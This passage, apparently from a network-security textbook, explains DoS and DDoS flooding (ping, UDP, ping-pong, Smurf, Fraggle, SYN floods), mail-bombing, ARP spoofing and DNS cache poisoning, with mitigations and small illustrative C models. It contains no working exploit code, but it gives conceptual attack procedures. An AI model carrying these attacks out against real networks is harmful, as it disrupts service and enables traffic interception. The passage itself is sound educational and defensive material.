center around bandwidth deprivation and, particularly when distributed, have been a huge

problem in recent years, with many high-profile attacks against companies such as Yahoo!

and eBay.

The simplest form of bandwidth-consuming DoS attack is to send more data to a machine

than it has resources to cope with. If all available bandwidth or resources to the target can be

used up, legitimate traffic cannot be processed. A primitive form of this attack is the ping flood,

where the target is bombarded with Internet Control Message Protocol (ICMP) echo requests,

clogging up the bandwidth in both directions, and putting a strain on the system's TCP/IP stack,

as the target attempts to reply to the pings. Many administrators are under the misconception

that blocking incoming ping requests at the firewall will solve this problem. Although this does halt the flow of ICMP replies leaving the network, downstream bandwidth between the ISP and

perimeter firewall/router is still affected, so this solution is only partially effective.

Ping flooding is a battle of bandwidth, because the attacker must saturate the victim's line to the

degree that legitimate traffic flows inefficiently; even then, unless the victim's TCP/IP stack can

be overwhelmed responding to these ICMP packets, legitimate packets will still get through.

The typical corporate network uses a leased line (generally of at least 2 Mbps) for Internet

connectivity, whereas the average home user only has access to dial-up or DSL/cable - often

with upstream traffic capped significantly lower than downstream. This presents a problem to

the attacker, because the bandwidth odds are firmly stacked against him. One "solution" is to

launch the ping flood from a compromised machine on a fast network, a university, for example.

Another is to introduce a Distributed DoS (DDoS) attack. DDoS attacks - the next logical step in

ping flooding - use the available bandwidth of many networks to operate. If the thought of

receiving 100 kbps of ICMP traffic from one compromised machine is worrisome, imagine what

happens when 10 more machines join in the attack!

UDP flooding is also common, in addition to ICMP flooding (and it doesn't just have to be ICMP

echo requests that are used). As with ping flooding, it is advantageous if the target machine can

be persuaded to reply to the UDP datagrams, so ports running UDP-based services such as

chargen, echo, and quote are commonly targeted. ICMP and UDP traffic can be easily spoofed

(the source address changed), which can lead a naive administrator to assume that thousands

of machines are participating in the attack, and point an accusing finger at innocent parties.

Ping-Pong Attack

In addition to offering an attacker the ability to hide his origin, source address spoofing also

opens the door for so-called ping-pong attacks, named as such because packets bounce back

and forth like ping-pong balls. The step-by-step procedure is given below:

1. An attacker identifies two machines, both running a UDP service such as chargen or echo. We will assume echo in this example.

2. The attacker sends UDP datagrams to port 7 (the port the echo daemon runs on) of machine A, with the packets forged to show machine B as the source address and UDP port 7 as the source port.

3. The echo daemon on machine A receives the datagram and echoes it back to what it thinks is the sender (machine B).

4. Machine B receives the datagram at its echo daemon and echoes it back to machine A.

5. This process continues ad infinitum, until one machine crashes or starts dropping the datagrams.

The ping-pong attack illustrated in Figure 2.4 has the potential to cripple the network between

the two machines for a long time, because once the attack starts, it does not require the

attacker's further intervention. Also note that the previous example referred to a single UDP

datagram - even from a slow connection, the attacker can slowly saturate each host's

connection and stack it with packets. Disabling unnecessary services such as echo and

chargen can eliminate the potential for this type of attack.

Figure 2.4

Distributed Flood Nets

With only a handful of compromised machines taking part in a distributed ping flood, the

attacker can easily Telnet in and manually start the attack on each, but when the number of

zombies, as they are commonly called, rises to a few hundred, this becomes impractical. DDoS attacks increased dramatically in 1999, when two tools developed to coordinate such

compromised networks were released. Although Trinoo and TFN look primitive by today's

standards, and have become largely obsolete, they are worth reviewing because they form the

basis for many more recent DDoS agents.

The Smurf Attack

The Smurf is perhaps the most dangerous of bandwidth-consuming DoS attacks. It first gained

recognition in 1997 with the release of proof-of-concept code by TFreak. Since then, the Smurf,

and its descendant, the Fraggle, have achieved widespread popularity with script writers

everywhere. In order to understand how the Smurf works, it is important to take a brief detour

into IP networking.

IP introduces the concept of a broadcast address, which is calculated from the subnet

mask by setting every host bit of a network address to 1; any data destined for this address is sent on to every host

on the network.

Pinging a broadcast address shows at a glance which hosts are alive on the network.
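
The broadcast address calculation can be written in a few lines. This is a minimal sketch, assuming IPv4 addresses held as 32-bit values in host byte order; the helper names ipv4 and broadcast_address are made up for illustration.

```c
#include <stdint.h>

/* Pack four dotted-quad octets into one 32-bit value (host byte order). */
uint32_t ipv4(uint8_t a, uint8_t b, uint8_t c, uint8_t d)
{
    return ((uint32_t)a << 24) | ((uint32_t)b << 16) |
           ((uint32_t)c << 8)  |  (uint32_t)d;
}

/* Keep the network bits of addr and set every host bit to 1. */
uint32_t broadcast_address(uint32_t addr, uint32_t netmask)
{
    return (addr & netmask) | ~netmask;
}
```

For example, broadcast_address(ipv4(192, 168, 0, 2), ipv4(255, 255, 255, 0)) yields the value for 192.168.0.255.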

Not all networks are configured to respond to broadcast traffic in this manner, and many that

are, do not allow it to pass through border routers; but some networks do, and these are

referred to as broadcast amplifiers. Imagine the following scenario: an attacker sends a stream

of ICMP echo requests to the broadcast address of a well-populated network, having rewritten

the source address to that of the victim machine. Each machine on the broadcast amplifier

responds to the ping request with an ICMP echo reply. Unfortunately, all the machines on the

broadcast amplifier have been fooled as to the true source of the ping request, and send their

replies to the victim, swamping him or her with traffic.

A broadcast amplifier usually contains several hundred responsive hosts on its network;

occasionally, an amplifier containing several thousand hosts will emerge. Doing the math shows

that even from a dialup connection, an attacker can still generate enough traffic to saturate a

T1.
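
The arithmetic behind that claim can be sketched as follows. The input figures are assumptions for illustration, not measurements: an attacker with roughly 28 kbps of usable dial-up upstream and an amplifier with 200 responsive hosts. A T1 carries 1.544 Mbps (1,544 kbps). The model also assumes that every host answers every request with a reply of the same size, and that the amplifier's own uplink is not the bottleneck.

```c
/* Traffic arriving at the victim, in kbps: each request sent to the
 * broadcast address is answered once by every responsive host. */
unsigned long smurf_victim_kbps(unsigned long attacker_kbps,
                                unsigned long responsive_hosts)
{
    return attacker_kbps * responsive_hosts;
}

/* Returns 1 if the traffic meets or exceeds the capacity of the link. */
int saturates_link(unsigned long traffic_kbps, unsigned long link_kbps)
{
    return traffic_kbps >= link_kbps;
}
```

Under these assumptions, smurf_victim_kbps(28, 200) gives 5,600 kbps, more than three times the capacity of a T1.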

The Fraggle is a variation of the Smurf, which uses UDP broadcast traffic instead of ICMP.

Although not as serious as the Smurf, Fraggles can still generate a large volume of traffic,

including ICMP unreachable messages if the targeted UDP port is not open.

There is no complete defense against either attack. Firewalling your network from the Internet is

the best available option, but the only real solution is to educate administrators about the dangers of

allowing their networks to be used as broadcast amplifiers.

SYN Flooding

One of the most popular DoS attacks is the SYN flood, in which the victim is bombarded with

connection requests, ultimately causing legitimate connections to be rejected, while consuming

system resources. Let us start by reviewing how a TCP connection between two hosts is

created. The client sends a TCP packet with the SYN (synchronization) flag set[7]. Upon receipt

of this packet, the server responds with a TCP packet, this time with the SYN and ACK

(acknowledgment) flags set. Finally, the client responds to the SYN-ACK with its own ACK. The

connection is now established, and data can flow.

What happens if the client fails to respond to the SYN-ACK? The server sits waiting for a short

time (generally 180 seconds), and then gives up; but memory assigned for the connection is

tied up during this waiting period. The idea behind SYN flooding is to bombard the server with

SYN packets, but not follow up with the final ACK. This leaves hundreds of half-open

connections, all consuming memory. Eventually the server will run out of memory, or the kernel

will decide there are too many pending connections. Legitimate hosts' new connection attempts

will be denied either way.
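
The effect of half-open connections on a bounded queue can be modeled in a few lines. This is a toy sketch, not how any particular kernel implements its backlog: BACKLOG_SIZE is a deliberately tiny hypothetical limit, the function names are made up, and the 180-second timeout is the figure quoted above.

```c
#include <stddef.h>

#define BACKLOG_SIZE 4     /* hypothetical; real limits are far larger */
#define SYN_TIMEOUT  180   /* seconds a half-open entry is kept */

struct half_open {
    int  in_use;
    long created_at;       /* arrival time of the SYN, in seconds */
};

static struct half_open backlog[BACKLOG_SIZE];

/* Free every slot whose SYN-ACK has gone unanswered for SYN_TIMEOUT. */
void expire_half_open(long now)
{
    for (size_t i = 0; i < BACKLOG_SIZE; i++)
        if (backlog[i].in_use && now - backlog[i].created_at >= SYN_TIMEOUT)
            backlog[i].in_use = 0;
}

/* Handle an incoming SYN. Returns the slot used, or -1 if the queue
 * is full and the connection attempt has to be refused. */
int on_syn(long now)
{
    expire_half_open(now);
    for (size_t i = 0; i < BACKLOG_SIZE; i++) {
        if (!backlog[i].in_use) {
            backlog[i].in_use = 1;
            backlog[i].created_at = now;
            return (int)i;
        }
    }
    return -1;
}

/* Handle the final ACK: the handshake is complete, so the slot is freed. */
void on_ack(int slot)
{
    if (slot >= 0 && slot < BACKLOG_SIZE)
        backlog[slot].in_use = 0;
}
```

A well-behaved client calls on_syn() and then on_ack() almost immediately, so its slot is reused at once. A flooder only ever calls on_syn(); once BACKLOG_SIZE entries are pending, every further on_syn() returns -1 until the oldest entries time out.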

Non-bandwidth-oriented DoS Attacks

Most networking daemons log their activities, the verbosity of such logs generally being

configurable by the administrator. Log files can grow quite large, and potentially fill up the filesystem. This may cause the daemons themselves to crash, not to mention causing dozens of

potential problems with the rest of the system. If an attacker can cause your daemons to log a

large amount of data, he can perform a rather crude DoS attack. Most daemons log connection

attempts, so an exploiter of this problem can repeatedly create and tear down connections to

the daemon. Although it will take many hours to generate significant logging, it will ultimately be

effective. The most popular type of attack in this category is to send thousands of e-mails to the

target, a process known as mail-bombing. This uses up significant disk space, causes network

congestion, and increases the memory/CPU used by the Mail Transfer Agent (MTA), which

greatly annoys an administrator, who has to attempt to separate these e-mails from legitimate

e-mails. Unsolicited junk e-mail (spam) on busy mail servers (such as those owned by ISPs)

can have a similar effect due to sheer volume.

TCP/IP ATTACKS

TCP and IP, and, to a lesser extent, UDP protocols, form the Internet's backbone. Attacks that

utilize shortcomings in these protocols can be potentially very serious, allowing an attacker to

hijack connections and intercept network traffic.

Closely related to IP are protocols such as ARP and DNS, which aid in identifying machines on

the Local Area Network (LAN) and on the Internet, respectively. Both are prime targets for

attack, as they offer the cracker the potential to impersonate other machines on the network,

perhaps allowing him to bypass host-based authentication or to receive sensitive data.

ARP Spoofing

Media Access Control (MAC) addresses are a property of the Ethernet adapter (i.e., the

networking card) of a host, providing a unique 48-bit physical address. The MAC allows hosts

on an Ethernet network to communicate, regardless of the overlying protocol. Sending data

from one machine to another on a LAN is a problem if the physical address is unknown. This is

where Address Resolution Protocol (ARP) comes in. ARP converts IP addresses to MAC

addresses, freeing higher levels from having to know anything about the network's physical

topology.

Each Ethernet host keeps recently resolved entries in an in-memory table (known as the ARP

cache) for faster lookups. View a Linux machine's ARP table using the arp command:

# arp

Address        HWtype  HWaddress          Flags Mask  Iface

192.168.0.2    ether   00:01:03:D3:9F:E4  C           eth0

cable-xxx.xx   ether   00:0C:31:F5:54:8C  C           eth1

To populate this table in the first place, ARP sends out requests to all machines on the LAN

(even on a switched network), asking, "Are you the owner of IP address xxx.xxx.xxx.xxx?" If one of the recipients has this address, it replies with its MAC address. ARP is a stateless

protocol, and many machines will blindly cache replies, regardless of whether a request was

actually issued. ARP spoofing is the process of sending bogus replies to poison clients'

caches in an attempt to mislead them as to who owns which IP, resulting in packets being sent

to the wrong host, usually one under the attacker's control.

ARP spoofing generally precedes packet-sniffing, connection-hijacking, or an attack on a host-

based authentication service.
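
The difference between blindly caching replies and accepting only solicited ones can be shown with a toy cache. This is a sketch under stated assumptions, not the behavior of any real network stack: the structure, the CACHE_SIZE limit, and all function names are hypothetical.

```c
#include <stdint.h>
#include <string.h>

#define CACHE_SIZE 8    /* hypothetical table size for the sketch */

struct arp_entry {
    uint32_t ip;
    uint8_t  mac[6];
    int      valid;     /* 1 once a MAC address has been cached */
    int      pending;   /* 1 while our own request is outstanding */
};

static struct arp_entry cache[CACHE_SIZE];

/* Find the slot tracking ip, or NULL if there is none. */
struct arp_entry *find_entry(uint32_t ip)
{
    for (int i = 0; i < CACHE_SIZE; i++)
        if ((cache[i].valid || cache[i].pending) && cache[i].ip == ip)
            return &cache[i];
    return NULL;
}

/* Find the slot for ip, or claim an unused one. NULL if the table is full. */
struct arp_entry *alloc_entry(uint32_t ip)
{
    struct arp_entry *e = find_entry(ip);
    if (e)
        return e;
    for (int i = 0; i < CACHE_SIZE; i++)
        if (!cache[i].valid && !cache[i].pending) {
            cache[i].ip = ip;
            return &cache[i];
        }
    return NULL;
}

/* Record that we broadcast a request for ip. Returns 0, or -1 if full. */
int arp_request_sent(uint32_t ip)
{
    struct arp_entry *e = alloc_entry(ip);
    if (!e)
        return -1;
    e->pending = 1;
    return 0;
}

/* Naive policy: cache every reply, solicited or not. Returns 1 if cached. */
int arp_reply_naive(uint32_t ip, const uint8_t mac[6])
{
    struct arp_entry *e = alloc_entry(ip);
    if (!e)
        return 0;
    memcpy(e->mac, mac, 6);
    e->valid = 1;
    e->pending = 0;
    return 1;
}

/* Stricter policy: accept a reply only while our request is outstanding. */
int arp_reply_strict(uint32_t ip, const uint8_t mac[6])
{
    struct arp_entry *e = find_entry(ip);
    if (!e || !e->pending)
        return 0;
    memcpy(e->mac, mac, 6);
    e->valid = 1;
    e->pending = 0;
    return 1;
}
```

With arp_reply_naive(), a forged reply overwrites a good entry at any time. With arp_reply_strict(), unsolicited replies are dropped, although an attacker who answers a genuine request before the real owner does can still win the race, so the stricter policy narrows the window rather than closing it.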

Domain Name System (DNS) Attacks

Domain name resolution is something we all take for granted. Even if we understand the

process behind it, most of us do not think about it when we enter http://www.google.com into

our web browsers. But what if a Domain Name System (DNS) cannot be trusted [Schuba93]?

What if, when we attempt to visit our favorite online store, the address resolves to that of a

black hat's server set up to look like the store?

Domain Name System (DNS) Cache Poisoning

BIND uses transaction IDs as an additional method of authenticating DNS replies (source port

and IP are among the others). In 1997, it was discovered that these IDs were chosen

sequentially, making it very easy for an attacker to send forged DNS replies. Subsequent

versions of BIND implemented random IDs to combat this problem. In 2002, it was found

that even this was not enough: by sending hundreds of bogus replies (Figure 2.5), the chances

of hitting the correct ID increased, and DNS cache poisoning became a practical threat again.

Figure 2.5: DNS Cache Poisoning
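
Why hundreds of replies are enough can be estimated with a short calculation. This is a rough model under stated assumptions, not a description of BIND's internals: transaction IDs are 16 bits wide (65,536 values), the nameserver has n queries for the same name outstanding with distinct IDs, each forged reply carries an independent, uniformly random ID, and the other checks (source address and port) are already satisfied. The function names are made up for illustration.

```c
/* Chance that at least one of n forged replies matches one of n
 * outstanding queries. Each reply misses with probability 1 - n/65536,
 * and all n replies must miss for the attack to fail. */
double poison_probability(unsigned n)
{
    const double id_space = 65536.0;
    double all_miss = 1.0;

    if (n >= 65536u)
        return 1.0;
    for (unsigned i = 0; i < n; i++)
        all_miss *= 1.0 - (double)n / id_space;
    return 1.0 - all_miss;
}

/* For comparison: n distinct guesses against one outstanding query. */
double single_query_probability(unsigned n)
{
    return n >= 65536u ? 1.0 : (double)n / 65536.0;
}
```

Under this model, a few hundred guesses against a single query succeed less than one time in a hundred, whereas the same number of replies against the same number of simultaneous queries succeed more often than not. This is the birthday effect that made the attack practical.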

The sequence of events in this attack is:

An attacker sends hundreds of queries for a particular domain. The attacker also sends spoofed

replies to these queries. The nameserver believes that these replies have come from the

authoritative nameserver, and caches the results for later use. Some
